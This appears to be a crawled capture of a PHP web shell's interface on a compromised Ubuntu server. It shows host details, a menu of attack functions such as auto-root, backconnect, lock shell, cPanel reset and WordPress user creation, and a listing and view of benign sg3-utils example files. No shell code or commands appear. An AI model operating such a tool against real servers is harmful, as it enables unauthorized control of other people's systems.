Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.155.190
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
sg3-utils /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
archive
[ DIR ]
drwxr-xr-x
Makefile
3.08
KB
-rw-r--r--
Makefile.freebsd
1.98
KB
-rw-r--r--
README
776
B
-rw-r--r--
forwarded_sense.txt
296
B
-rw-r--r--
nvme_dev_self_test.hex
806
B
-rw-r--r--
nvme_identify_ctl.hex
1.17
KB
-rw-r--r--
reassign_addr.txt
465
B
-rw-r--r--
ref_sense.txt
305
B
-rw-r--r--
scsi_inquiry.c.gz
1.59
KB
-rw-r--r--
sdiag_sas_p0_cjtpat.txt
405
B
-rw-r--r--
sdiag_sas_p1_cjtpat.txt
464
B
-rw-r--r--
sdiag_sas_p1_idle.txt
560
B
-rw-r--r--
sdiag_sas_p1_stop.txt
359
B
-rw-r--r--
sg__sat_identify.c.gz
3.01
KB
-rw-r--r--
sg__sat_phy_event.c.gz
4.21
KB
-rw-r--r--
sg__sat_set_features.c.gz
3.33
KB
-rw-r--r--
sg_compare_and_write.txt
2.43
KB
-rw-r--r--
sg_excl.c.gz
1.99
KB
-rw-r--r--
sg_persist_tst.sh
3.54
KB
-rwxr-xr-x
sg_sat_chk_power.c.gz
3.24
KB
-rw-r--r--
sg_sat_smart_rd_data.c.gz
2.61
KB
-rw-r--r--
sg_simple1.c.gz
2
KB
-rw-r--r--
sg_simple16.c
3.41
KB
-rw-r--r--
sg_simple2.c.gz
2.09
KB
-rw-r--r--
sg_simple3.c.gz
2.1
KB
-rw-r--r--
sg_simple4.c.gz
2.33
KB
-rw-r--r--
sg_simple5.c.gz
1.89
KB
-rw-r--r--
sg_unmap_example.txt
1.6
KB
-rw-r--r--
sgq_dd.c.gz
8.95
KB
-rw-r--r--
transport_ids.txt
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sg_unmap_example.txt
# sg_unmap_example.txt # This is an example of the contents of a file that can be given to sg_unmap # For example, assume the /dev/sdc is a scratch disk (e.g. one made by the # scsi_debug kernel module) then: # sg_unmap --in=sg_unmap_example.txt /dev/sdc 0x12345677,1 # unmap LBA 0x12345677 0x12345678 2 # unmap LBA 0x12345678 and 0x12345679 0x12340000 3333 # unmap 3333 blocks starting at LBA 0x12340000 0X5a5a5a5a5a 0 # unmaps 0 blocks (i.e. does nothing) a5a5a5h 7 # unmap 7 blocks starting at LBA 0xa5a5a5 # Note that there can be leading and trailing whitespace and whitespace # (plus comma) can be a separator. # # Example invocation: # $ sg_unmap --in=../examples/sg_unmap_example.txt -vv /dev/sdc # open /dev/sg2 with flags=0x802 # unmap cdb: 42 00 00 00 00 00 00 00 58 00 # unmap parameter list: # 00 56 00 50 00 00 00 00 00 00 00 00 12 34 56 77 # 00 00 00 01 00 00 00 00 00 00 00 00 12 34 56 78 # 00 00 00 02 00 00 00 00 00 00 00 00 12 34 00 00 # 00 00 0d 05 00 00 00 00 00 00 00 5a 5a 5a 5a 5a # 00 00 00 00 00 00 00 00 00 00 00 00 00 a5 a5 a5 # 00 00 00 07 00 00 00 00 # sg_cmds_process_resp: slen=18 # unmap: Fixed format, current; Sense key: Illegal Request # Additional sense: Invalid command operation code # Raw sense data (in hex): # 70 00 05 00 00 00 00 0a 00 00 00 00 20 00 00 00 # 00 00 # UNMAP not supported # # -------------------------------------------------------- # Notice the 8 byte header then 5 descriptors in the parameter # list
Close